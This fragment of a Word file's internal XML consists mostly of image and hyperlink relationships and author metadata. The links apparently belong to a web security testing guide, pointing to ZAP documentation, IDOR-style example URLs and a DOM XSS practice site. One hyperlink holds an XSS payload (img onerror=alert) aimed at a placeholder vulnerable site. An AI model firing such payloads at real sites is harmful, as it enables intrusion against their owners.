    <w:name w:val="eop"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="449E37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8805a754a3454197" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/numbering" Target="numbering.xml" Id="Rc9dd4d6a482640c0" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/imageb.png" Id="Rcf4a58c5a3f344d0" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/imagec.png" Id="Raa14408a12bd41cf" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/imaged.png" Id="Rc2eefd130f994b41" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/imagef.png" Id="R258c33f32eac4304" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image10.png" Id="Rae3d7396b9194cc6" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image13.png" Id="R1271d1a119ac4598" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image15.png" Id="R2b8579b0034d44f9" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image16.png" Id="R87c2388611a242a8" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image17.png" Id="Ra736dcfa08e949a4" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image18.png" Id="R5dde91cc2bbe4122" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image19.png" Id="Rcbb11fa38d024bcc" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image1b.png" Id="R83d61a4c1def4829" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image1d.png" Id="R5532b5472fbf4cd9" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://inc-word-edit.officeapps.live.com/we/encoder.html" TargetMode="External" Id="R2bfa83cf70ad4736" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://example.com/app/accountInfo?acct=notmyacct" TargetMode="External" Id="R80437baf10e84fe8" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://example.com/app/getappInfo" TargetMode="External" Id="Rd0255054f4ac40d7" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://example.com/app/admin_getappInfo" TargetMode="External" Id="Rba6e032d40c741e2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://vulnerable.site/page.html?user=&lt;img%20src='aaa'%20onerror=alert(1" TargetMode="External" Id="R6c9a0916709a4ca2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.domxss.com/domxss/01_Basics/06_jquery_old_html.html" TargetMode="External" Id="R07d35060ef274332" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image1e.png" Id="R74110b7cb0a84199" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image1f.png" Id="Reb765b09abad422a" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image20.png" Id="Ra880d5ea49f34785" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image21.png" Id="Rf26d2ad14226479f" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image22.png" Id="R896119b945a443b3" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image23.png" Id="R3537c7598b7845de" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image24.png" Id="R2fbdcc8fa85d44a0" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image25.png" Id="R09064f2a3c59416c" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image26.png" Id="R86217e2ba0c54e76" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image27.png" Id="R9acbe0fffd6e46b8" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image28.png" Id="R1b63bc6cbb594c91" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.zaproxy.org/docs/desktop/start/features/tags/" TargetMode="External" Id="R27316b50e28f447c" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.zaproxy.org/docs/desktop/start/features/alerts/" TargetMode="External" Id="Ra4ee13645099455b" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.zaproxy.org/docs/desktop/ui/dialogs/options/pscan/" TargetMode="External" Id="R7c487016891e4264" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.zaproxy.org/docs/desktop/ui/dialogs/options/pscanrules/" TargetMode="External" Id="Rac4c63e3460d4cfd" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.zaproxy.org/docs/desktop/ui/dialogs/managetags/" TargetMode="External" Id="R73fe01e2c26545e9" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.zaproxy.org/docs/desktop/start/features/pscan/" TargetMode="External" Id="R0b7931b2468c4de0" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.zaproxy.org/docs/desktop/ui/tabs/history/" TargetMode="External" Id="R1249d1b26a3e4cb6" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.zaproxy.org/docs/desktop/ui/dialogs/hist_filter/" TargetMode="External" Id="Rc8518808997149bf" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.zaproxy.org/docs/desktop/start/checks/" TargetMode="External" Id="R96cfba033aec40fc" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.zaproxy.org/docs/desktop/start/features/ascan/" TargetMode="External" Id="Ra9173b17ab784061" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.zaproxy.org/docs/desktop/ui/dialogs/advascan/" TargetMode="External" Id="R080339a2442f49fb" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.zaproxy.org/docs/desktop/start/features/modes/" TargetMode="External" Id="R1692af3c836146b9" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.zaproxy.org/docs/desktop/ui/dialogs/options/ascan/" TargetMode="External" Id="R17d0f385b68d4156" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://inc-word-edit.officeapps.live.com/start/features/ascan.html" TargetMode="External" Id="R4a90be24265d478a" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://inc-word-edit.officeapps.live.com/start/features/pscan.html" TargetMode="External" Id="R6d4b9c2cbbc341f8" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://inc-word-edit.officeapps.live.com/ui/dialogs/options/pscanrules.html" TargetMode="External" Id="R4b1f1381b6fe4018" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image29.png" Id="R7dbedb1b6cf1477a" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image2a.png" Id="Rf9eac3bd730f4143" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image2b.png" Id="R096ec69be37641fa" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image2c.png" Id="Ra3a926793b0f4097" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image2d.png" Id="R5cab3e135e7647ae" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image2e.png" Id="Rac4580bf557540b1" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image2f.png" Id="R20a05c25392e4e13" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image30.png" Id="Rb2dbb0b0ebc34175" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image31.png" Id="Rcb8636bcc5d543e4" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image32.png" Id="Rd9416a8415ce4e59" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image33.png" Id="R698996b07a73497d" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image34.png" Id="R3c8fac0ca0c7446e" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image35.png" Id="Racf1879d56524e60" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image36.png" Id="R8f6bccb188c84ccf" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image37.png" Id="R2c5de9dd6556479a" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image38.png" Id="Rf7a398af232145d0" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://opensource-demo.orangehrmlive.com/web/index.php/pim/viewPersonalDetails/empNumber/275" TargetMode="External" Id="Rb24fe1db1ecf449d" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image39.png" Id="Rd9fb829657e54767" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image3a.png" Id="Rb09162bf14c542b0" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image3b.png" Id="R4f820d8daeb8482c" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image3c.png" Id="Rf6ccd3ebe0454486" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image3d.png" Id="Rec82200bbf8f4157" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image3e.png" Id="R8de876a3a8844ef7" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://example.com/app/accountView?id=" TargetMode="External" Id="R50e8a2db8ed540d5" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image3f.png" Id="R7ac2781113b049b3" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image40.png" Id="R4e1c6908fba7494f" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image42.png" Id="Read89019ff2c447a" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image43.png" Id="R54f48be80f22462b" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image44.png" Id="R54fde74e00f7472f" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image45.png" Id="Rcd22185a164246bc" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image46.png" Id="R95f7930797d94ade" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image47.png" Id="R9ce6135f267f4a5a" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image48.png" Id="R8db05e24e364456a" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image49.png" Id="R59cee8d62b0d4141" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image4a.png" Id="R752635ddf72847c4" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image4b.png" Id="R63cba6c0450c4c3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2023-08-30T07:19:07.0545429Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-01-28T10:41:09.3323755Z</dcterms:modified>
  <dc:creator>Sowmya Medisetty</dc:creator>
  <lastModifiedBy>Sowmya Medisetty</lastModifiedBy>
</coreProperties>
</file>